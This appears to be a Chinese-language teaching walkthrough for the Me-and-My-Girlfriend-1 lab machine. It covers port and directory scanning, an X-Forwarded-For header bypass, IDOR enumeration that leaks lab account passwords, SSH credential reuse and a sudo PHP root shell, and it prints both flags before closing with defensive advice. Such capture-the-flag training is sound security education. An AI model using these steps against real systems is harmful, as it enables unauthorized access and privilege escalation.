Me-and-My-Girlfriend-1 靶机渗透训练教学文档<\/h1>

靶机概述<\/h2>

名称：Me-and-My-Girlfriend-1<\/li>
难度：入门级<\/li>

主要技术点：信息收集、HTTP头绕过、水平越权、SSH撞库、PHP提权<\/li> <\/ul>

一、信息收集阶段<\/h2>

1. 主机探测<\/h3>

使用工具：nmap\/arp-scan<\/li>

发现存活IP：192.168.116.128<\/li> <\/ul>

2. 端口扫描<\/h3>

nmap -sV 192.168.116.128
<\/code><\/pre>

开放端口：

22\/tcp - SSH服务<\/li>
80\/tcp - HTTP服务<\/li>
<\/ul>
<\/li>
<\/ul>
3. 目录扫描<\/h3>

使用工具：dirb\/gobuster\/dirsearch<\/li>
命令示例：<\/li>
<\/ul>
gobuster dir -u http:\/\/192.168.116.128 -w \/path\/to\/wordlist.txt
<\/code><\/pre>
二、Web渗透阶段<\/h2>
1. 初步访问<\/h3>

直接访问80端口网站，前台无明显功能点<\/li>
<\/ul>
2. HTTP头绕过<\/h3>

发现网站限制只能从本地访问<\/li>
绕过方法：添加X-Forwarded-For头<\/li>
<\/ul>
X-Forwarded-For: 127.0.0.1
<\/code><\/pre>

实现方式：

使用Burp Suite修改请求头<\/li>
使用浏览器插件：

Firefox: Header Editor<\/li>
Chrome\/IE: ModHeader<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
<\/ul>
3. 功能分析<\/h3>

发现登录\/注册功能<\/li>
SQL注入测试无果<\/li>
<\/ul>
4. 水平越权漏洞<\/h3>

登录后URL特征：id=<\/code><\/li>
手动测试ID参数：

id=1 → eweuhtandingan\/skuyatuh<\/li>
id=2 → aingmaung\/qwerty!!!<\/li>
id=3 → sundatea\/indONEsia<\/li>
id=4 → sedihaingmah\/cedihhihihi<\/li>
id=5 → alice\/4lic3<\/li>
id=9 → abdikasepak\/dorrrrr<\/li>
<\/ul>
<\/li>
<\/ul>
三、系统权限获取<\/h2>
1. SSH撞库攻击<\/h3>

使用获取的凭据尝试SSH登录：

alice\/4lic3 → 登录成功<\/li>
<\/ul>
<\/li>
<\/ul>
2. 获取Flag1<\/h3>

登录后查看当前目录：<\/li>
<\/ul>
ls
<\/code><\/pre>

发现Flag1：<\/li>
<\/ul>
gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
<\/code><\/pre>
四、权限提升阶段<\/h2>
1. 检查sudo权限<\/h3>
sudo -l
<\/code><\/pre>

发现：<\/li>
<\/ul>
User alice may run the following commands on target:
    (root) NOPASSWD: \/usr\/bin\/php
<\/code><\/pre>
2. PHP提权<\/h3>

测试PHP执行：<\/li>
<\/ul>
php -r "phpinfo();"
<\/code><\/pre>

提权命令：<\/li>
<\/ul>
sudo php -r "system('\/bin\/bash');"
<\/code><\/pre>

成功获取root shell<\/li>
<\/ul>
3. 获取Flag2<\/h3>

进入root目录：<\/li>
<\/ul>
cd \/root
ls
<\/code><\/pre>

发现Flag2：<\/li>
<\/ul>
gfriEND{56fbeef560930e77ff984b644fde66e7}
<\/code><\/pre>
关键知识点总结<\/h2>

HTTP头绕过<\/strong>：X-Forwarded-For常用于绕过IP限制<\/li>
水平越权<\/strong>：通过修改ID参数访问其他用户数据<\/li>
凭据重用<\/strong>：Web应用凭据可能在SSH等服务中重用<\/li>
sudo提权<\/strong>：检查用户可无密码执行的命令<\/li>
PHP提权<\/strong>：通过PHP的system函数执行shell<\/li>
<\/ol>
防御建议<\/h2>

实施严格的访问控制，不只是依赖HTTP头<\/li>
使用随机UUID而非自增ID作为用户标识<\/li>
实施密码策略，避免密码重用<\/li>
限制sudo权限，避免给普通用户过高权限<\/li>
对系统进行定期安全审计<\/li>
<\/ol>

Me-and-My-Girlfriend-1 靶机渗透训练教学文档<\/h1>

一、信息收集阶段<\/h2>

二、Web渗透阶段<\/h2>

三、系统权限获取<\/h2>

四、权限提升阶段<\/h2>

防御建议<\/h2> 实施严格的访问控制，不只是依赖HTTP头<\/li> 使用随机UUID而非自增ID作为用户标识<\/li> 实施密码策略，避免密码重用<\/li> 限制sudo权限，避免给普通用户过高权限<\/li> 对系统进行定期安全审计<\/li> <\/ol>

防御建议<\/h2>

实施严格的访问控制，不只是依赖HTTP头<\/li>
使用随机UUID而非自增ID作为用户标识<\/li>
实施密码策略，避免密码重用<\/li>
限制sudo权限，避免给普通用户过高权限<\/li>
对系统进行定期安全审计<\/li> <\/ol>